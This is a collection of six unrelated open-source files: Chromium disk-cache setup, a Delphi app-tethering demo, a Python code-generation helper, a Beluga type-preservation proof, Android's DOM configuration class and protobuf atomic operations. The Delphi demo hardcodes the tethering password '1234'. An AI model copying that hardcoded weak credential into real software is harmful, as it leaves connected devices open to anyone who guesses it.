// Copyright (c) 2012 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #include <utility> #include "base/files/file_path.h" #include "base/macros.h" #include "base/metrics/field_trial.h" #include "base/single_thread_task_runner.h" #include "base/task_scheduler/task_scheduler.h" #include "net/base/cache_type.h" #include "net/base/net_errors.h" #include "net/disk_cache/backend_cleanup_tracker.h" #include "net/disk_cache/blockfile/backend_impl.h" #include "net/disk_cache/cache_util.h" #include "net/disk_cache/disk_cache.h" #include "net/disk_cache/memory/mem_backend_impl.h" #include "net/disk_cache/simple/simple_backend_impl.h" namespace { // Builds an instance of the backend depending on platform, type, experiments // etc. Takes care of the retry state. This object will self-destroy when // finished. class CacheCreator { public: CacheCreator(const base::FilePath& path, bool force, int max_bytes, net::CacheType type, net::BackendType backend_type, uint32_t flags, net::NetLog* net_log, std::unique_ptr<disk_cache::Backend>* backend, base::OnceClosure post_cleanup_callback, net::CompletionOnceCallback callback); int TryCreateCleanupTrackerAndRun(); // Creates the backend, the cleanup context for it having been already // established... or purposefully left as null. int Run(); private: ~CacheCreator(); void DoCallback(int result); void OnIOComplete(int result); const base::FilePath path_; bool force_; bool retry_; int max_bytes_; net::CacheType type_; net::BackendType backend_type_; #if !defined(OS_ANDROID) uint32_t flags_; #endif std::unique_ptr<disk_cache::Backend>* backend_; base::OnceClosure post_cleanup_callback_; net::CompletionOnceCallback callback_; std::unique_ptr<disk_cache::Backend> created_cache_; net::NetLog* net_log_; scoped_refptr<disk_cache::BackendCleanupTracker> cleanup_tracker_; DISALLOW_COPY_AND_ASSIGN(CacheCreator); }; CacheCreator::CacheCreator(const base::FilePath& path, bool force, int max_bytes, net::CacheType type, net::BackendType backend_type, uint32_t flags, net::NetLog* net_log, std::unique_ptr<disk_cache::Backend>* backend, base::OnceClosure post_cleanup_callback, net::CompletionOnceCallback callback) : path_(path), force_(force), retry_(false), max_bytes_(max_bytes), type_(type), backend_type_(backend_type), #if !defined(OS_ANDROID) flags_(flags), #endif backend_(backend), post_cleanup_callback_(std::move(post_cleanup_callback)), callback_(std::move(callback)), net_log_(net_log) { } CacheCreator::~CacheCreator() = default; int CacheCreator::Run() { #if defined(OS_ANDROID) static const bool kSimpleBackendIsDefault = true; #else static const bool kSimpleBackendIsDefault = false; #endif if (backend_type_ == net::CACHE_BACKEND_SIMPLE || (backend_type_ == net::CACHE_BACKEND_DEFAULT && kSimpleBackendIsDefault)) { disk_cache::SimpleBackendImpl* simple_cache = new disk_cache::SimpleBackendImpl(path_, cleanup_tracker_.get(), /* file_tracker = */ nullptr, max_bytes_, type_, net_log_); created_cache_.reset(simple_cache); return simple_cache->Init( base::Bind(&CacheCreator::OnIOComplete, base::Unretained(this))); } // Avoid references to blockfile functions on Android to reduce binary size. #if defined(OS_ANDROID) return net::ERR_FAILED; #else disk_cache::BackendImpl* new_cache = new disk_cache::BackendImpl( path_, cleanup_tracker_.get(), /*cache_thread = */ nullptr, net_log_); created_cache_.reset(new_cache); new_cache->SetMaxSize(max_bytes_); new_cache->SetType(type_); new_cache->SetFlags(flags_); int rv = new_cache->Init( base::Bind(&CacheCreator::OnIOComplete, base::Unretained(this))); DCHECK_EQ(net::ERR_IO_PENDING, rv); return rv; #endif } int CacheCreator::TryCreateCleanupTrackerAndRun() { // Before creating a cache Backend, a BackendCleanupTracker object is needed // so there is a place to keep track of outstanding I/O even after the backend // object itself is destroyed, so that further use of the directory // doesn't race with those outstanding disk I/O ops. // This method's purpose it to grab exlusive ownership of a fresh // BackendCleanupTracker for the cache path, and then move on to Run(), // which will take care of creating the actual cache backend. It's possible // that something else is currently making use of the directory, in which // case BackendCleanupTracker::TryCreate will fail, but will just have // TryCreateCleanupTrackerAndRun run again at an opportune time to make // another attempt. // The resulting BackendCleanupTracker is stored into a scoped_refptr member // so that it's kept alive while |this| CacheCreator exists , so that in the // case Run() needs to retry Backend creation the same BackendCleanupTracker // is used for both attempts, and |post_cleanup_callback_| gets called after // the second try, not the first one. cleanup_tracker_ = disk_cache::BackendCleanupTracker::TryCreate( path_, base::BindOnce(base::IgnoreResult( &CacheCreator::TryCreateCleanupTrackerAndRun), base::Unretained(this))); if (!cleanup_tracker_) return net::ERR_IO_PENDING; if (!post_cleanup_callback_.is_null()) cleanup_tracker_->AddPostCleanupCallback(std::move(post_cleanup_callback_)); return Run(); } void CacheCreator::DoCallback(int result) { DCHECK_NE(net::ERR_IO_PENDING, result); if (result == net::OK) { *backend_ = std::move(created_cache_); } else { LOG(ERROR) << "Unable to create cache"; created_cache_.reset(); } std::move(callback_).Run(result); delete this; } // If the initialization of the cache fails, and |force| is true, we will // discard the whole cache and create a new one. void CacheCreator::OnIOComplete(int result) { if (result == net::OK || !force_ || retry_) return DoCallback(result); // This is a failure and we are supposed to try again, so delete the object, // delete all the files, and try again. retry_ = true; created_cache_.reset(); if (!disk_cache::DelayedCacheCleanup(path_)) return DoCallback(result); // The worker thread will start deleting files soon, but the original folder // is not there anymore... let's create a new set of files. int rv = Run(); DCHECK_EQ(net::ERR_IO_PENDING, rv); } } // namespace namespace disk_cache { int CreateCacheBackendImpl(net::CacheType type, net::BackendType backend_type, const base::FilePath& path, int max_bytes, bool force, net::NetLog* net_log, std::unique_ptr<Backend>* backend, base::OnceClosure post_cleanup_callback, net::CompletionOnceCallback callback) { DCHECK(!callback.is_null()); if (type == net::MEMORY_CACHE) { std::unique_ptr<MemBackendImpl> mem_backend_impl = disk_cache::MemBackendImpl::CreateBackend(max_bytes, net_log); if (mem_backend_impl) { mem_backend_impl->SetPostCleanupCallback( std::move(post_cleanup_callback)); *backend = std::move(mem_backend_impl); return net::OK; } else { if (!post_cleanup_callback.is_null()) base::SequencedTaskRunnerHandle::Get()->PostTask( FROM_HERE, std::move(post_cleanup_callback)); return net::ERR_FAILED; } } bool had_post_cleanup_callback = !post_cleanup_callback.is_null(); CacheCreator* creator = new CacheCreator( path, force, max_bytes, type, backend_type, kNone, net_log, backend, std::move(post_cleanup_callback), std::move(callback)); if (type == net::DISK_CACHE || type == net::MEDIA_CACHE) { DCHECK(!had_post_cleanup_callback); return creator->Run(); } return creator->TryCreateCleanupTrackerAndRun(); } int CreateCacheBackend(net::CacheType type, net::BackendType backend_type, const base::FilePath& path, int max_bytes, bool force, net::NetLog* net_log, std::unique_ptr<Backend>* backend, net::CompletionOnceCallback callback) { return CreateCacheBackendImpl(type, backend_type, path, max_bytes, force, net_log, backend, base::OnceClosure(), std::move(callback)); } int CreateCacheBackend(net::CacheType type, net::BackendType backend_type, const base::FilePath& path, int max_bytes, bool force, net::NetLog* net_log, std::unique_ptr<Backend>* backend, base::OnceClosure post_cleanup_callback, net::CompletionOnceCallback callback) { return CreateCacheBackendImpl( type, backend_type, path, max_bytes, force, net_log, backend, std::move(post_cleanup_callback), std::move(callback)); } void FlushCacheThreadForTesting() { // For simple backend. SimpleBackendImpl::FlushWorkerPoolForTesting(); base::TaskScheduler::GetInstance()->FlushForTesting(); // Block backend. BackendImpl::FlushForTesting(); } int Backend::CalculateSizeOfEntriesBetween(base::Time initial_time, base::Time end_time, CompletionOnceCallback callback) { return net::ERR_NOT_IMPLEMENTED; } uint8_t Backend::GetEntryInMemoryData(const std::string& key) { return 0; } void Backend::SetEntryInMemoryData(const std::string& key, uint8_t data) {} } // namespace disk_cache
{ "pile_set_name": "Github" }
//--------------------------------------------------------------------------- // This software is Copyright (c) 2015 Embarcadero Technologies, Inc. // You may only use this software if you are an authorized licensee // of an Embarcadero developer tools product. // This software is considered a Redistributable as defined under // the software license agreement that comes with the Embarcadero Products // and is subject to that software license agreement. //--------------------------------------------------------------------------- unit DesktopWall; interface uses System.SysUtils, System.Types, System.UITypes, System.Classes, System.Variants, FMX.Types, FMX.Graphics, FMX.Controls, FMX.Forms, FMX.Dialogs, FMX.StdCtrls, FMX.Objects, IPPeerClient, IPPeerServer, System.Tether.Manager, System.Tether.AppProfile, System.Tether.NetworkAdapter; type TForm48 = class(TForm) MediaReceiverManager: TTetheringManager; MediaReceiverProfile: TTetheringAppProfile; CalloutPanel1: TCalloutPanel; Image1: TImage; Label1: TLabel; procedure MediaReceiverProfileResourceReceived(const Sender: TObject; const AResource: TRemoteResource); procedure MediaReceiverManagerRequestManagerPassword(const Sender: TObject; const RemoteIdentifier: string; var Password: string); private { Private declarations } public { Public declarations } end; var Form48: TForm48; implementation {$R *.fmx} procedure TForm48.MediaReceiverManagerRequestManagerPassword(const Sender: TObject; const RemoteIdentifier: string; var Password: string); begin Password := '1234'; end; procedure TForm48.MediaReceiverProfileResourceReceived(const Sender: TObject; const AResource: TRemoteResource); begin Image1.Bitmap.LoadFromStream(AResource.Value.AsStream); end; end.
{ "pile_set_name": "Github" }
#!/usr/bin/env python2.7 # -*- coding: utf-8 -*- import os import subprocess SDS_JSON_FILE_EXTENSION = '.sdsjson' def fail(*args): error = ' '.join(str(arg) for arg in args) raise Exception(error) git_repo_path = os.path.abspath(subprocess.check_output(['git', 'rev-parse', '--show-toplevel']).strip()) print 'git_repo_path:', git_repo_path def sds_to_relative_path(path): path = os.path.abspath(path) if not path.startswith(git_repo_path): fail('Unexpected path:', path) path = path[len(git_repo_path):] if path.startswith(os.sep): path = path[len(os.sep):] return path def sds_from_relative_path(path): return os.path.join(git_repo_path, path) def clean_up_generated_code(text): # Remove trailing whitespace. lines = text.split('\n') lines = [line.rstrip() for line in lines] text = '\n'.join(lines) # Compact newlines. while '\n\n\n' in text: text = text.replace('\n\n\n', '\n\n') # Ensure there's a trailing newline. return text.strip() + '\n' def clean_up_generated_swift(text): return clean_up_generated_code(text) def clean_up_generated_objc(text): return clean_up_generated_code(text) def pretty_module_path(path): path = os.path.abspath(path) if path.startswith(git_repo_path): path = path[len(git_repo_path):] return path def write_text_file_if_changed(file_path, text): if os.path.exists(file_path): with open(file_path, 'rt') as f: oldText = f.read() if oldText == text: return with open(file_path, 'wt') as f: f.write(text)
{ "pile_set_name": "Github" }
%{ Lambda-terms }% LF tp: type = | nat: tp | arr: tp -> tp -> tp ; LF term: type = | app: term -> term -> term | lam: tp -> (term -> term) -> term ; LF value: term -> type = | v_lam: value (lam T M) ; schema ctx = term; % [x:tm, y:tm |- x] % [x:tm, y:tm |- lam \w. app x w] % % ---------------------------------------------------------- % % Small-step operational semantics LF step: term -> term -> type = | e_app_1 : step M1 M1' -> step (app M1 M2) (app M1' M2) | e_app_2 : step M2 M2' -> value M1 -> step (app M1 M2) (app M1 M2') | e_app_abs : value M2 -> step (app (lam T M) M2) (M M2) ; % ---------------------------------------------------------- % LF hastype: term -> tp -> type = | t_lam : ({x:term} hastype x T -> hastype (E x) S) -> hastype (lam T E) (arr T S) | t_app: hastype E1 (arr T S) -> hastype E2 T -> hastype (app E1 E2) S ; % ---------------------------------------------------------- % rec tps: [ |- hastype M T] -> [ |- step M N] -> [ |- hastype N T] = / total s (tps m t n d s)/ fn d => fn s => case s of | [ |- e_app_1 S1] => let [ |- t_app D1 D2] = d in let [ |- F1] = tps [ |- D1] [ |- S1] in [ |- t_app F1 D2 ] | [ |- e_app_2 S2 _ ] => let [ |- t_app D1 D2] = d in let [ |- F2] = tps [ |- D2] [ |- S2] in [ |- t_app D1 F2] | [ |- e_app_abs V] => let [ |- t_app (t_lam \x.\u. D) D2] = d in [ |- D[_,D2]] ;
{ "pile_set_name": "Github" }
/* * Copyright (C) 2010 The Android Open Source Project * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.harmony.xml.dom; import java.util.Map; import java.util.TreeMap; import org.w3c.dom.DOMConfiguration; import org.w3c.dom.DOMError; import org.w3c.dom.DOMErrorHandler; import org.w3c.dom.DOMException; import org.w3c.dom.DOMStringList; import org.w3c.dom.NamedNodeMap; import org.w3c.dom.Node; /** * A minimal implementation of DOMConfiguration. This implementation uses inner * parameter instances to centralize each parameter's behavior. */ public final class DOMConfigurationImpl implements DOMConfiguration { private static final Map<String, Parameter> PARAMETERS = new TreeMap<String, Parameter>(String.CASE_INSENSITIVE_ORDER); static { /* * True to canonicalize the document (unsupported). This includes * removing DocumentType nodes from the tree and removing unused * namespace declarations. Setting this to true also sets these * parameters: * entities = false * normalize-characters = false * cdata-sections = false * namespaces = true * namespace-declarations = true * well-formed = true * element-content-whitespace = true * Setting these parameters to another value shall revert the canonical * form to false. */ PARAMETERS.put("canonical-form", new FixedParameter(false)); /* * True to keep existing CDATA nodes; false to replace them/merge them * into adjacent text nodes. */ PARAMETERS.put("cdata-sections", new BooleanParameter() { public Object get(DOMConfigurationImpl config) { return config.cdataSections; } public void set(DOMConfigurationImpl config, Object value) { config.cdataSections = (Boolean) value; } }); /* * True to check character normalization (unsupported). */ PARAMETERS.put("check-character-normalization", new FixedParameter(false)); /* * True to keep comments in the document; false to discard them. */ PARAMETERS.put("comments", new BooleanParameter() { public Object get(DOMConfigurationImpl config) { return config.comments; } public void set(DOMConfigurationImpl config, Object value) { config.comments = (Boolean) value; } }); /* * True to expose schema normalized values. Setting this to true sets * the validate parameter to true. Has no effect when validate is false. */ PARAMETERS.put("datatype-normalization", new BooleanParameter() { public Object get(DOMConfigurationImpl config) { return config.datatypeNormalization; } public void set(DOMConfigurationImpl config, Object value) { if ((Boolean) value) { config.datatypeNormalization = true; config.validate = true; } else { config.datatypeNormalization = false; } } }); /* * True to keep whitespace elements in the document; false to discard * them (unsupported). */ PARAMETERS.put("element-content-whitespace", new FixedParameter(true)); /* * True to keep entity references in the document; false to expand them. */ PARAMETERS.put("entities", new BooleanParameter() { public Object get(DOMConfigurationImpl config) { return config.entities; } public void set(DOMConfigurationImpl config, Object value) { config.entities = (Boolean) value; } }); /* * Handler to be invoked when errors are encountered. */ PARAMETERS.put("error-handler", new Parameter() { public Object get(DOMConfigurationImpl config) { return config.errorHandler; } public void set(DOMConfigurationImpl config, Object value) { config.errorHandler = (DOMErrorHandler) value; } public boolean canSet(DOMConfigurationImpl config, Object value) { return value == null || value instanceof DOMErrorHandler; } }); /* * Bulk alias to set the following parameter values: * validate-if-schema = false * entities = false * datatype-normalization = false * cdata-sections = false * namespace-declarations = true * well-formed = true * element-content-whitespace = true * comments = true * namespaces = true. * Querying this returns true if all of the above parameters have the * listed values; false otherwise. */ PARAMETERS.put("infoset", new BooleanParameter() { public Object get(DOMConfigurationImpl config) { // validate-if-schema is always false // element-content-whitespace is always true // namespace-declarations is always true return !config.entities && !config.datatypeNormalization && !config.cdataSections && config.wellFormed && config.comments && config.namespaces; } public void set(DOMConfigurationImpl config, Object value) { if ((Boolean) value) { // validate-if-schema is always false // element-content-whitespace is always true // namespace-declarations is always true config.entities = false; config.datatypeNormalization = false; config.cdataSections = false; config.wellFormed = true; config.comments = true; config.namespaces = true; } } }); /* * True to perform namespace processing; false for none. */ PARAMETERS.put("namespaces", new BooleanParameter() { public Object get(DOMConfigurationImpl config) { return config.namespaces; } public void set(DOMConfigurationImpl config, Object value) { config.namespaces = (Boolean) value; } }); /** * True to include namespace declarations; false to discard them * (unsupported). Even when namespace declarations are discarded, * prefixes are retained. * * Has no effect if namespaces is false. */ PARAMETERS.put("namespace-declarations", new FixedParameter(true)); /* * True to fully normalize characters (unsupported). */ PARAMETERS.put("normalize-characters", new FixedParameter(false)); /* * A list of whitespace-separated URIs representing the schemas to validate * against. Has no effect if schema-type is null. */ PARAMETERS.put("schema-location", new Parameter() { public Object get(DOMConfigurationImpl config) { return config.schemaLocation; } public void set(DOMConfigurationImpl config, Object value) { config.schemaLocation = (String) value; } public boolean canSet(DOMConfigurationImpl config, Object value) { return value == null || value instanceof String; } }); /* * URI representing the type of schema language, such as * "http://www.w3.org/2001/XMLSchema" or "http://www.w3.org/TR/REC-xml". */ PARAMETERS.put("schema-type", new Parameter() { public Object get(DOMConfigurationImpl config) { return config.schemaType; } public void set(DOMConfigurationImpl config, Object value) { config.schemaType = (String) value; } public boolean canSet(DOMConfigurationImpl config, Object value) { return value == null || value instanceof String; } }); /* * True to split CDATA sections containing "]]>"; false to signal an * error instead. */ PARAMETERS.put("split-cdata-sections", new BooleanParameter() { public Object get(DOMConfigurationImpl config) { return config.splitCdataSections; } public void set(DOMConfigurationImpl config, Object value) { config.splitCdataSections = (Boolean) value; } }); /* * True to require validation against a schema or DTD. Validation will * recompute element content whitespace, ID and schema type data. * * Setting this unsets validate-if-schema. */ PARAMETERS.put("validate", new BooleanParameter() { public Object get(DOMConfigurationImpl config) { return config.validate; } public void set(DOMConfigurationImpl config, Object value) { // validate-if-schema is always false config.validate = (Boolean) value; } }); /* * True to validate if a schema was declared (unsupported). Setting this * unsets validate. */ PARAMETERS.put("validate-if-schema", new FixedParameter(false)); /* * True to report invalid characters in node names, attributes, elements, * comments, text, CDATA sections and processing instructions. */ PARAMETERS.put("well-formed", new BooleanParameter() { public Object get(DOMConfigurationImpl config) { return config.wellFormed; } public void set(DOMConfigurationImpl config, Object value) { config.wellFormed = (Boolean) value; } }); // TODO add "resource-resolver" property for use with LS feature... } private boolean cdataSections = true; private boolean comments = true; private boolean datatypeNormalization = false; private boolean entities = true; private DOMErrorHandler errorHandler; private boolean namespaces = true; private String schemaLocation; private String schemaType; private boolean splitCdataSections = true; private boolean validate = false; private boolean wellFormed = true; interface Parameter { Object get(DOMConfigurationImpl config); void set(DOMConfigurationImpl config, Object value); boolean canSet(DOMConfigurationImpl config, Object value); } static class FixedParameter implements Parameter { final Object onlyValue; FixedParameter(Object onlyValue) { this.onlyValue = onlyValue; } public Object get(DOMConfigurationImpl config) { return onlyValue; } public void set(DOMConfigurationImpl config, Object value) { if (!onlyValue.equals(value)) { throw new DOMException(DOMException.NOT_SUPPORTED_ERR, "Unsupported value: " + value); } } public boolean canSet(DOMConfigurationImpl config, Object value) { return onlyValue.equals(value); } } static abstract class BooleanParameter implements Parameter { public boolean canSet(DOMConfigurationImpl config, Object value) { return value instanceof Boolean; } } public boolean canSetParameter(String name, Object value) { Parameter parameter = PARAMETERS.get(name); return parameter != null && parameter.canSet(this, value); } public void setParameter(String name, Object value) throws DOMException { Parameter parameter = PARAMETERS.get(name); if (parameter == null) { throw new DOMException(DOMException.NOT_FOUND_ERR, "No such parameter: " + name); } try { parameter.set(this, value); } catch (NullPointerException e) { throw new DOMException(DOMException.TYPE_MISMATCH_ERR, "Null not allowed for " + name); } catch (ClassCastException e) { throw new DOMException(DOMException.TYPE_MISMATCH_ERR, "Invalid type for " + name + ": " + value.getClass()); } } public Object getParameter(String name) throws DOMException { Parameter parameter = PARAMETERS.get(name); if (parameter == null) { throw new DOMException(DOMException.NOT_FOUND_ERR, "No such parameter: " + name); } return parameter.get(this); } public DOMStringList getParameterNames() { final String[] result = PARAMETERS.keySet().toArray(new String[PARAMETERS.size()]); return new DOMStringList() { public String item(int index) { return index < result.length ? result[index] : null; } public int getLength() { return result.length; } public boolean contains(String str) { return PARAMETERS.containsKey(str); // case-insensitive. } }; } public void normalize(Node node) { /* * Since we don't validate, this code doesn't take into account the * following "supported" parameters: datatype-normalization, entities, * schema-location, schema-type, or validate. * * TODO: normalize namespaces */ switch (node.getNodeType()) { case Node.CDATA_SECTION_NODE: CDATASectionImpl cdata = (CDATASectionImpl) node; if (cdataSections) { if (cdata.needsSplitting()) { if (splitCdataSections) { cdata.split(); report(DOMError.SEVERITY_WARNING, "cdata-sections-splitted"); } else { report(DOMError.SEVERITY_ERROR, "wf-invalid-character"); } } checkTextValidity(cdata.buffer); break; } node = cdata.replaceWithText(); // fall through case Node.TEXT_NODE: TextImpl text = (TextImpl) node; text = text.minimize(); if (text != null) { checkTextValidity(text.buffer); } break; case Node.COMMENT_NODE: CommentImpl comment = (CommentImpl) node; if (!comments) { comment.getParentNode().removeChild(comment); break; } if (comment.containsDashDash()) { report(DOMError.SEVERITY_ERROR, "wf-invalid-character"); } checkTextValidity(comment.buffer); break; case Node.PROCESSING_INSTRUCTION_NODE: checkTextValidity(((ProcessingInstructionImpl) node).getData()); break; case Node.ATTRIBUTE_NODE: checkTextValidity(((AttrImpl) node).getValue()); break; case Node.ELEMENT_NODE: ElementImpl element = (ElementImpl) node; NamedNodeMap attributes = element.getAttributes(); for (int i = 0; i < attributes.getLength(); i++) { normalize(attributes.item(i)); } // fall through case Node.DOCUMENT_NODE: case Node.DOCUMENT_FRAGMENT_NODE: Node next; for (Node child = node.getFirstChild(); child != null; child = next) { // lookup next eagerly because normalize() may remove its subject next = child.getNextSibling(); normalize(child); } break; case Node.NOTATION_NODE: case Node.DOCUMENT_TYPE_NODE: case Node.ENTITY_NODE: case Node.ENTITY_REFERENCE_NODE: break; default: throw new DOMException(DOMException.NOT_SUPPORTED_ERR, "Unsupported node type " + node.getNodeType()); } } private void checkTextValidity(CharSequence s) { if (wellFormed && !isValid(s)) { report(DOMError.SEVERITY_ERROR, "wf-invalid-character"); } } /** * Returns true if all of the characters in the text are permitted for use * in XML documents. */ private boolean isValid(CharSequence text) { for (int i = 0; i < text.length(); i++) { char c = text.charAt(i); // as defined by http://www.w3.org/TR/REC-xml/#charsets. boolean valid = c == 0x9 || c == 0xA || c == 0xD || (c >= 0x20 && c <= 0xd7ff) || (c >= 0xe000 && c <= 0xfffd); if (!valid) { return false; } } return true; } private void report(short severity, String type) { if (errorHandler != null) { // TODO: abort if handleError returns false errorHandler.handleError(new DOMErrorImpl(severity, type)); } } }
{ "pile_set_name": "Github" }
// Protocol Buffers - Google's data interchange format // Copyright 2012 Google Inc. All rights reserved. // https://developers.google.com/protocol-buffers/ // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions are // met: // // * Redistributions of source code must retain the above copyright // notice, this list of conditions and the following disclaimer. // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following disclaimer // in the documentation and/or other materials provided with the // distribution. // * Neither the name of Google Inc. nor the names of its // contributors may be used to endorse or promote products derived from // this software without specific prior written permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR // A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT // OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, // SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT // LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, // DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT // (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE // OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. // This file is an internal atomic implementation, use atomicops.h instead. #ifndef GOOGLE_PROTOBUF_ATOMICOPS_INTERNALS_GENERIC_C11_ATOMIC_H_ #define GOOGLE_PROTOBUF_ATOMICOPS_INTERNALS_GENERIC_C11_ATOMIC_H_ #include <atomic> namespace google_public { namespace protobuf { namespace internal { // This implementation is transitional and maintains the original API for // atomicops.h. This requires casting memory locations to the atomic types, and // assumes that the API and the C++11 implementation are layout-compatible, // which isn't true for all implementations or hardware platforms. The static // assertion should detect this issue, were it to fire then this header // shouldn't be used. // // TODO(jfb) If this header manages to stay committed then the API should be // modified, and all call sites updated. typedef volatile std::atomic<Atomic32>* AtomicLocation32; static_assert(sizeof(*(AtomicLocation32) nullptr) == sizeof(Atomic32), "incompatible 32-bit atomic layout"); inline void MemoryBarrierInternal() { #if defined(__GLIBCXX__) // Work around libstdc++ bug 51038 where atomic_thread_fence was declared but // not defined, leading to the linker complaining about undefined references. __atomic_thread_fence(std::memory_order_seq_cst); #else std::atomic_thread_fence(std::memory_order_seq_cst); #endif } inline Atomic32 NoBarrier_CompareAndSwap(volatile Atomic32* ptr, Atomic32 old_value, Atomic32 new_value) { ((AtomicLocation32)ptr) ->compare_exchange_strong(old_value, new_value, std::memory_order_relaxed, std::memory_order_relaxed); return old_value; } inline Atomic32 NoBarrier_AtomicExchange(volatile Atomic32* ptr, Atomic32 new_value) { return ((AtomicLocation32)ptr) ->exchange(new_value, std::memory_order_relaxed); } inline Atomic32 NoBarrier_AtomicIncrement(volatile Atomic32* ptr, Atomic32 increment) { return increment + ((AtomicLocation32)ptr) ->fetch_add(increment, std::memory_order_relaxed); } inline Atomic32 Barrier_AtomicIncrement(volatile Atomic32* ptr, Atomic32 increment) { return increment + ((AtomicLocation32)ptr)->fetch_add(increment); } inline Atomic32 Acquire_CompareAndSwap(volatile Atomic32* ptr, Atomic32 old_value, Atomic32 new_value) { ((AtomicLocation32)ptr) ->compare_exchange_strong(old_value, new_value, std::memory_order_acquire, std::memory_order_acquire); return old_value; } inline Atomic32 Release_CompareAndSwap(volatile Atomic32* ptr, Atomic32 old_value, Atomic32 new_value) { ((AtomicLocation32)ptr) ->compare_exchange_strong(old_value, new_value, std::memory_order_release, std::memory_order_relaxed); return old_value; } inline void NoBarrier_Store(volatile Atomic32* ptr, Atomic32 value) { ((AtomicLocation32)ptr)->store(value, std::memory_order_relaxed); } inline void Acquire_Store(volatile Atomic32* ptr, Atomic32 value) { ((AtomicLocation32)ptr)->store(value, std::memory_order_relaxed); MemoryBarrierInternal(); } inline void Release_Store(volatile Atomic32* ptr, Atomic32 value) { ((AtomicLocation32)ptr)->store(value, std::memory_order_release); } inline Atomic32 NoBarrier_Load(volatile const Atomic32* ptr) { return ((AtomicLocation32)ptr)->load(std::memory_order_relaxed); } inline Atomic32 Acquire_Load(volatile const Atomic32* ptr) { return ((AtomicLocation32)ptr)->load(std::memory_order_acquire); } inline Atomic32 Release_Load(volatile const Atomic32* ptr) { MemoryBarrierInternal(); return ((AtomicLocation32)ptr)->load(std::memory_order_relaxed); } #if defined(GOOGLE_PROTOBUF_ARCH_64_BIT) typedef volatile std::atomic<Atomic64>* AtomicLocation64; static_assert(sizeof(*(AtomicLocation64) nullptr) == sizeof(Atomic64), "incompatible 64-bit atomic layout"); inline Atomic64 NoBarrier_CompareAndSwap(volatile Atomic64* ptr, Atomic64 old_value, Atomic64 new_value) { ((AtomicLocation64)ptr) ->compare_exchange_strong(old_value, new_value, std::memory_order_relaxed, std::memory_order_relaxed); return old_value; } inline Atomic64 NoBarrier_AtomicExchange(volatile Atomic64* ptr, Atomic64 new_value) { return ((AtomicLocation64)ptr) ->exchange(new_value, std::memory_order_relaxed); } inline Atomic64 NoBarrier_AtomicIncrement(volatile Atomic64* ptr, Atomic64 increment) { return increment + ((AtomicLocation64)ptr) ->fetch_add(increment, std::memory_order_relaxed); } inline Atomic64 Barrier_AtomicIncrement(volatile Atomic64* ptr, Atomic64 increment) { return increment + ((AtomicLocation64)ptr)->fetch_add(increment); } inline Atomic64 Acquire_CompareAndSwap(volatile Atomic64* ptr, Atomic64 old_value, Atomic64 new_value) { ((AtomicLocation64)ptr) ->compare_exchange_strong(old_value, new_value, std::memory_order_acquire, std::memory_order_acquire); return old_value; } inline Atomic64 Release_CompareAndSwap(volatile Atomic64* ptr, Atomic64 old_value, Atomic64 new_value) { ((AtomicLocation64)ptr) ->compare_exchange_strong(old_value, new_value, std::memory_order_release, std::memory_order_relaxed); return old_value; } inline void NoBarrier_Store(volatile Atomic64* ptr, Atomic64 value) { ((AtomicLocation64)ptr)->store(value, std::memory_order_relaxed); } inline void Acquire_Store(volatile Atomic64* ptr, Atomic64 value) { ((AtomicLocation64)ptr)->store(value, std::memory_order_relaxed); MemoryBarrierInternal(); } inline void Release_Store(volatile Atomic64* ptr, Atomic64 value) { ((AtomicLocation64)ptr)->store(value, std::memory_order_release); } inline Atomic64 NoBarrier_Load(volatile const Atomic64* ptr) { return ((AtomicLocation64)ptr)->load(std::memory_order_relaxed); } inline Atomic64 Acquire_Load(volatile const Atomic64* ptr) { return ((AtomicLocation64)ptr)->load(std::memory_order_acquire); } inline Atomic64 Release_Load(volatile const Atomic64* ptr) { MemoryBarrierInternal(); return ((AtomicLocation64)ptr)->load(std::memory_order_relaxed); } #endif // defined(GOOGLE_PROTOBUF_ARCH_64_BIT) } // namespace internal } // namespace protobuf } // namespace google #endif // GOOGLE_PROTOBUF_ATOMICOPS_INTERNALS_GENERIC_C11_ATOMIC_H_
{ "pile_set_name": "Github" }
